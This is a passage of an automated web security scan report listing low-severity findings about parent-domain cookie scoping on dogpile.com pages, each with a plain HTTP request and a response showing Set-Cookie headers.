The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=58f66cc309544e4c8136c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:47 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:47 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:47 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:47 GMT
Connection: close
Content-Length: 45947
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.32. http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=48a161ef0c404dfb82c8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:52 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:51 GMT
Connection: close
Content-Length: 45608
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.33. http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=News/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=News/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=191540b0b4b6493e9fedc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:39 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:38 GMT
Connection: close
Content-Length: 45626
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.34. http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=81608220bc3644438a64c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:38 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:38 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:38 GMT
Connection: close
Content-Length: 45626
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.35. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=f9207591fc7a45ddb5a6c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:51 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:51 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:51 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:51 GMT
Connection: close
Content-Length: 45927
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.36. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=a2dfd4c239b0441ea9d6c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:46 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:46 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:45 GMT
Connection: close
Content-Length: 31901
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.37. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=b2ec7d68211642c28148c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:56 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:56 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:56 GMT
Connection: close
Content-Length: 32496
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.38. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=f61de8d9831c485b9678c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:44 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:44 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:43 GMT
Connection: close
Content-Length: 42313
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.39. http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=4be46901fe6f41908e5ec16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:37 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:37 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:37 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:37 GMT
Connection: close
Content-Length: 45658
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.40. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/preferences/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/preferences/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 16:58:06 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=0d789ad599844ecb8757c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:06 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:06 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:06 GMT
Connection: close
Content-Length: 51033
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.41. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 16:58:05 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=b178c96e1aba4492b2dac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:05 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:05 GMT
Connection: close
Content-Length: 51035
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.42. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/privacy/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/privacy/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d08462ba76864b45a153c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:35 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:35 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:35 GMT
Connection: close
Content-Length: 62215
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.43. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true
Content-Length: 2186
Cache-Control: max-age=0
Origin: http://www.dogpile.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:12 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com

__VIEWSTATE=%2FwEPDwULLTEwNzYxNjAxNjBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBR5pY2VQYWdlJFNlYXJjaEJveFRvcCRxa3dzdWJtaXQFLmljZVBhZ2UkU2VhcmNoQm94VG9wJEFkdmFuY2VkU2VhcmNoV2ViJGluY2x1ZGUFLmljZV
...[SNIP]...

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/site!3Axss!FEcx/1/417/TopNavigation/Relevance/iq=true/zoom=off/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ed5033e7ad35480d9635c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=09595e0bb31848b5a194c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:27 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:27 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:27 GMT
Connection: close
Content-Length: 258

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/site!3Axss!FEcx/1/417/TopNavigation/Relevance/iq=true/zoom=off/_i
...[SNIP]...

6.44. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:13 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=afded22df52249fea4b3c16a3af0cb01&ActionId=03e0e226b781481fa972c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/Dark%20Sites/1/302360/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=39b2b41ff5024c0491eec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=03e0e226b781481fa972c16a3af0cb01&ActionId=14be2b84e19340ef829ac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:59 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:59 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:59 GMT
Connection: close
Content-Length: 260

